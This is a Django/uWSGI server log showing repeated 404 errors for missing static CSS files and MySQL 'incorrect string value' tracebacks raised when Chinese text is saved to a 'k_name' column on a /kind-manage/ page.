+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 1057/1358] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 09:05:56 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1058/1359] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 09:05:56 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 1059/1360] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 09:05:56 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 1060/1361] 219.228.146.156 () {48 vars in 1029 bytes} [Thu Jan 14 09:05:58 2021] POST /kind-manage/? => generated 27 bytes in 14 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 1061/1362] 219.228.146.156 () {40 vars in 934 bytes} [Thu Jan 14 09:06:00 2021] GET /kind-manage/ => generated 8296 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 1062/1363] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 09:06:00 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 1064/1364] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 09:06:00 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 44 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 1065/1365] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 09:06:00 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1066/1366] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:06:00 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 1067/1367] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:06:00 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 1068/1368] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 09:06:00 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 96 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1068/1369] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 09:06:00 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 13 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1069/1370] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 09:06:00 2021] GET /static/css/spinners.css => generated 3516 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 1070/1371] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 09:06:00 2021] GET /static/css/animate.css => generated 3513 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1071/1372] 219.228.146.156 () {48 vars in 1027 bytes} [Thu Jan 14 09:06:06 2021] POST /kind-manage/ => generated 27 bytes in 37 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1072/1373] 219.228.146.156 () {40 vars in 933 bytes} [Thu Jan 14 09:06:06 2021] GET /kind-manage/ => generated 7366 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 1073/1374] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 09:06:08 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 12 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 1074/1375] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 09:06:08 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 1075/1376] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 09:06:08 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 1076/1377] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 09:06:08 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 1077/1378] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:06:08 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1078/1379] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:06:08 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 1079/1380] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 09:06:08 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1080/1381] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 09:06:08 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 1081/1382] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 09:06:08 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1083/1383] 219.228.146.156 () {40 vars in 934 bytes} [Thu Jan 14 09:06:16 2021] GET /kind-manage/? => generated 7366 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Internal Server Error: /kind-manage/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE4\\xBD\\xA0\\xE5\\xA5\\xBD...' for column 'k_name' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 541, in kind_manage
+ models.Kind.objects.create(k_name=k_name)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE4\\xBD\\xA0\\xE5\\xA5\\xBD...' for column 'k_name' at row 1")
+[pid: 11057|app: 0|req: 1083/1384] 219.228.146.156 () {48 vars in 1027 bytes} [Thu Jan 14 09:06:16 2021] POST /kind-manage/ => generated 207096 bytes in 113 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+[uwsgi-http key: 188.131.132.108:8000 client_addr: 219.228.146.156 client_port: 40958] hr_write(): Broken pipe [plugins/http/http.c line 565]
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 1084/1385] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 09:06:17 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 1085/1386] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 09:06:17 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 1086/1387] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 09:06:17 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 1087/1388] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 09:06:17 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 13 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1088/1389] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:06:17 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 1089/1390] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 09:06:17 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 30 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 1090/1391] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:06:17 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1091/1392] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 09:06:17 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 1092/1393] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 09:06:17 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1093/1394] 219.228.146.156 () {42 vars in 965 bytes} [Thu Jan 14 09:06:22 2021] GET /kind-manage/? => generated 7366 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1094/1395] 219.228.146.156 () {42 vars in 965 bytes} [Thu Jan 14 09:06:28 2021] GET /kind-manage/? => generated 7366 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 1095/1396] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 09:06:30 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 1096/1397] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 09:06:30 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 1097/1398] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 09:06:30 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 1098/1399] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 09:06:30 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 1099/1400] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:06:30 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1100/1401] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:06:30 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 1101/1402] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 09:06:30 2021] GET /static/css/animate.css => generated 3513 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 1102/1403] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 09:06:30 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1103/1404] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 09:06:30 2021] GET /static/css/spinners.css => generated 3516 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1104/1405] 219.228.146.156 () {42 vars in 965 bytes} [Thu Jan 14 09:06:41 2021] GET /kind-manage/? => generated 7366 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 1105/1406] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 09:06:41 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 1106/1407] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 09:06:41 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 1107/1408] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 09:06:41 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 1108/1409] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 09:06:41 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 1110/1410] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:06:41 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1110/1411] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:06:41 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 16 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 1111/1412] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 09:06:41 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1112/1413] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 09:06:41 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 1113/1414] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 09:06:41 2021] GET /static/css/animate.css => generated 3513 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Internal Server Error: /kind-manage/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE4\\xBD\\xA0\\xE5\\xA5\\xBD...' for column 'k_name' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 541, in kind_manage
+ models.Kind.objects.create(k_name=k_name)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
